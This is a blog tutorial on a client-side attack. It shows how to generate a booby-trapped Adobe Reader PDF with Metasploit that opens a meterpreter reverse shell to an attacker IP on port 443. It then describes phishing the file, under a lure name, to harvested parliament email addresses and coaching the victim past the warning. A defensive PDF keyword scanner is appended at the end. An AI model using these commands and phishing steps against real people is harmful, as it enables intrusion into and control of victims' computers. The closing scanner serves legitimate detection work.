Client Side Attack Using Adobe PDF Escape EXE Social Engineering


Type : Tutorial

Level : Medium, Hard

Testing Platform : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

Some people say that the weakest link in security is the human. I can't say that's wrong, because in fact the human often is the weakest link, but I also can't say it's entirely true, because sometimes people don't know what they are doing simply because nobody told them before 🙂 .

In this tutorial I will demonstrate a client-side attack using the Adobe PDF Escape EXE vulnerability. Almost 95% (maybe) of Windows users have the Adobe Acrobat (Acrobat Reader) application on their computers or laptops.

If you watched or read the news a few weeks ago about Australian parliament computers being compromised by unknown hackers: the hackers actually used a social engineering technique to gain access to the parliament computers, and it was almost the same method as the one used in this tutorial.

Okay, here's the scenario for this attack method:

1. The parliament has an e-mail address, let's say parliament@vishnuvalentino.com. Usually this type of user (maybe about 80%) only knows how to use a computer without knowing the risks that come with it; if there's any problem, they call IT support to fix the mess 🙂 .

In this scenario the attacker (me) uses computer-based social engineering. After visiting Facebook and Google a few times, and some dumpster diving around the parliament office, the attacker has collected a list of parliament e-mail addresses.

Requirement :

1. Metasploit Framework

2. Windows or Linux OS (I'm using BackTrack 5 in this tutorial)

Step By Step Client Side Attack Using Adobe PDF Escape EXE Social Engineering:

1. First, I will create the malicious PDF for this attack using the vulnerability in Adobe Reader: Adobe PDF Escape EXE Social Engineering (No JavaScript).

Legend:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Select the Adobe PDF embedded EXE exploit module

set payload windows/meterpreter/reverse_tcp --> Set the payload so a Meterpreter session is returned when the exploit succeeds

set filename Important_Meeting_Notice.pdf --> Name the file as interestingly as you can so the victim will open the malicious PDF

set lhost 192.168.8.92 --> Attacker IP address (change it to your IP)

set lport 443 --> I'm using this port so the victim's proxy doesn't block the traffic (443 is always open :p )

exploit --> Generate the malicious PDF

After the malicious PDF has been generated, it is stored on your local computer. I've highlighted it in yellow in the screenshot; check the directory containing the malicious PDF file.

2. The next step is sending the malicious PDF to the target's e-mail address. In this case I will send it to parliament@vishnuvalentino.com (see the scenario above if you're still asking why).

3. After sending the malicious PDF, we need to set up a listener to catch the reverse connection. We will use msfconsole to set up a multi/handler listener.

4. The victim (parliament@vishnuvalentino.com) opens the e-mail and scans the attachment with their antivirus.

The antivirus finds nothing.

5. When the victim opens our malicious PDF, an alert box appears that guides the victim to tick "Do not show this message again" and click Open.

6. After the victim clicks the Open button, our listener catches the reverse connection.

Yep, we're in! 🙂

Notes:

– After successfully performing this attack, try to migrate the process to Explorer.exe (see the tutorial here, steps 2 and 3).

Countermeasure:

1. When you open a file and an alert appears, read the alert carefully. Clicking "Next" or "OK" as soon as an alert appears is sometimes not a good idea 😛

Hope you enjoyed it! 🙂
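Reading the alert is the last line of defence; the first one is not trusting the antivirus verdict from step 4 alone. Below is a small triage check that a mail gateway or a responder could run over an inbound PDF. This is added example code, not part of the original tutorial and not Metasploit's own code. As far as I know, the module used in step 1 works by embedding the executable as a PDF file attachment and adding a Launch action that fires when the document is opened, which is exactly what the alert in step 5 is warning about; the scanner counts the PDF keywords that technique needs. The keyword list, the verdict rules and both sample documents are my own constructed assumptions.

```python
import re
from typing import Dict, List, Tuple

# PDF keywords worth counting on an inbound document. An attachment-and-launch PDF
# needs an /EmbeddedFile object plus a /Launch action to run it; /JavaScript, /JS,
# /OpenAction and /AA are the other usual triggers. /ObjStm marks compressed object
# streams whose contents a plain byte scan like this one cannot see.
KEYWORDS = (b"/EmbeddedFile", b"/Launch", b"/JavaScript", b"/JS",
            b"/OpenAction", b"/AA", b"/ObjStm")

# PDF names may hex-escape any character (/L#61unch is the same name as /Launch),
# which defeats naive string matching, so escapes are undone before counting.
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_names(data: bytes) -> bytes:
    """Replace every #xx escape with the byte it encodes."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> Dict[str, int]:
    """Count each keyword as a whole PDF name (/EmbeddedFile must not match /EmbeddedFiles)."""
    data = normalize_names(data)
    counts = {}
    for kw in KEYWORDS:
        pattern = re.compile(re.escape(kw) + rb"(?![A-Za-z0-9])")
        counts[kw.decode()] = len(pattern.findall(data))
    return counts


def assess(data: bytes) -> Tuple[str, List[str]]:
    """Return (verdict, reasons) where verdict is 'quarantine', 'review' or 'clean'."""
    c = count_keywords(data)
    reasons = []
    verdict = "clean"
    if c["/EmbeddedFile"] and c["/Launch"]:
        reasons.append("embedded file plus Launch action: the attachment is run when the document opens")
        verdict = "quarantine"
    elif c["/Launch"]:
        reasons.append("Launch action present")
        verdict = "review"
    if c["/JavaScript"] or c["/JS"]:
        reasons.append("JavaScript present")
        verdict = "quarantine"
    if c["/OpenAction"] or c["/AA"]:
        reasons.append("automatic action on open or on a document event")
        verdict = "review" if verdict == "clean" else verdict
    if c["/ObjStm"]:
        reasons.append("object streams present: compressed objects were not inspected")
        verdict = "review" if verdict == "clean" else verdict
    return verdict, reasons


# Constructed sample: a minimal PDF skeleton that attaches a file and launches it
# from OpenAction, with the Launch name hex-escaped to exercise normalization.
# It is not a working document, just the structure a triage scan should flag.
SUSPICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R "
    b"/Names << /EmbeddedFiles << /Names [(update.exe) 5 0 R] >> >> >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /Type /Action /S /L#61unch /Win << /F (update.exe) >> >> endobj\n"
    b"5 0 obj << /Type /Filespec /F (update.exe) /EF << /F 6 0 R >> >> endobj\n"
    b"6 0 obj << /Type /EmbeddedFile /Length 2 >> stream\nMZ\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample: a one-page PDF skeleton with no actions or attachments.
CLEAN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, doc in (("suspicious sample", SUSPICIOUS_PDF), ("clean sample", CLEAN_PDF)):
        verdict, reasons = assess(doc)
        print(f"{label}: {verdict}")
        for reason in reasons:
            print(f"  - {reason}")
```

Two caveats a practitioner should keep in mind. First, this is a keyword count over raw bytes, so anything inside a FlateDecode stream or an object stream is invisible to it; that is why a non-zero /ObjStm count is reported as a reason to look closer rather than ignored. Second, the hex-escape normalization runs over the whole file, including binary stream data, so on a real document it can occasionally create a spurious match; treat the output as a triage signal that decides whether the file gets opened in a sandbox or a proper PDF parser, not as a final verdict.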


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
